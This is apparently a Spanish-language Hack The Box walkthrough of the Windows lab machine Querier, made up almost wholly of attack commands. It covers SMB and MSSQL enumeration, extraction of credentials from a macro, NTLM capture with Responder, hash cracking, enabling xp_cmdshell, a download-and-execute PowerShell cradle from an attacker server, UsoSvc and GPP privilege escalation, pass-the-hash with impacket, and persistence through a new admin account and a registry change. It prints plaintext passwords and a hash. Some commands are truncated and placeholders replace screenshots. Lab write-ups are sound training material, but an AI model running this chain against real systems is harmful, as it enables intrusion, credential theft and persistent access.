Cu3rv0x
Querier

Querier


HTB Windows

nmap -p- —open -T5 -v -n 10.129.1.147

nmap -p- —open -T5 -v -n 10.129.1.147 —max-retries 0 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -pX 10.129.1.147 -oN targeted —version-intensity 0

ssh_command.

ssh_command.

crackmapexec smb 10.129.1.147

ssh_command.

smbclient -L 10.129.1.147 -N

Vemos que podemos accesar a Reports

ssh_command.

Vemos que esta abierto el puerto 1433 que tiene ms-sql-s

locate mssqlclient.py

ssh_command.

ssh_command.

smbclient “//10.129.1.147/Reports/” -N

get “Currency volume Report.xlsm”

exit

ssh_command.

olevba Currency Volume Report.xlsm

ssh_command.

crackmapexec smb 10.129.1.147 -u ‘reporting’ -p ‘PcwTWTHRwryjc$c6’

crackmapexec smb 10.129.1.147 -u ‘reporting’ -p ‘PcwTWTHRwryjc$c6’ -d WORKGROUP

ssh_command.

ssh_command.

ssh_command.

ssh_command.

Vemos el hash de NTLM

ssh_command.

python2 /opt/Responder/Responder.py -I tun0 -rdw

ssh_command.

xp_dirtree “\10.10.14.108\si

ssh_command.

john —wordlist=/usr/share/wordlists/rockyou.txt querier_hash.txt

ssh_command.

crackmapexec 10.129.1.147 -u ‘mssql-svc’ -p ‘corporate568’ -d WORKGROUP

ssh_command.

ssh_command.

sp_configure “show advanced”, 1

sp_configure “xp_cmdshell”, 1

reconfigure

xp_cmdshell “whoami”

ssh_command.

xp_cmdshell “ipconfig”

ssh_command.

cp /home/kali/Desktop/boxes/Invoke-PowerShellTcp.ps1 .

python3 -m http.server 8888

ssh_command.

Parece que un servicio pone por defecto las configuraciones anteriores.

ssh_command.

ipconfig

puede ser potato

ssh_command.

whoami /priv

ssh_command.

Agregamos Invoke-AllChecks al final de Powerup.ps1

hacemos un python server

python3 -m http.server 8888

ssh_command.

ssh_command.

IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.108:8888/PowerUp.ps1’)

ssh_command.

Podemos ver el servicio de UsoSvc. Los pasos estan en este wiki

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Example with Windows 10 - CVE-2019-1322 UsoSvc

ssh_command.

Vemos las credenciales encontradas en Groups.xml

ssh_command.

Se puede ver el hash que se le asigna a cpassword

ssh_command.

gpp-decrypt “HASH”

Vemos que es el mismo que MyUnclesAreMarioAndLuigi!!1!

ssh_command.

crackmapexec smb 10.129.1.147 -u ‘Administrator’ -p ‘MyUnclesAreMarioAndLuigi!!1!’

crackmapexec smb 10.129.1.147 -u ‘Administrator’ -p ‘MyUnclesAreMarioAndLuigi!!1! -d WORKGROUP —sam’

ssh_command.

python3 /opt/impacket/examples/smbexec.py WORKGROUP/Administrator@10.129.1.147 -hashes :2dcefe78334b42c0ce483b8e1b2886ab

ssh_command.

net user cu3rv0x pass123 /add

ssh_command.

net localgroup “Administrators” cu3rv0x /add

ssh_command.

net share attacker_folder=C:\Windows\Temp /GRANT:Administrators, FULL

ssh_command.

reg add HKLM\SOFTWARE\Microsoft\CurrentVersion\System\Policies /v LocalAccountTokentFilterPolicy /t REG_DWORD /d 1 /f

ssh_command.

ssh_command.

crackmapexec smb 10.129.1.147 -u ‘cu3rv0x’ -p ‘pass123’

ssh_command.

python3 /opt/impacket/examples/wmiexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe -hashes :2dcefe78334b42c0ce483b8e1b2886ab

ssh_command.

python3 /opt/impacket/examples/psexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe

ssh_command.

© 2025 Cu3rv0x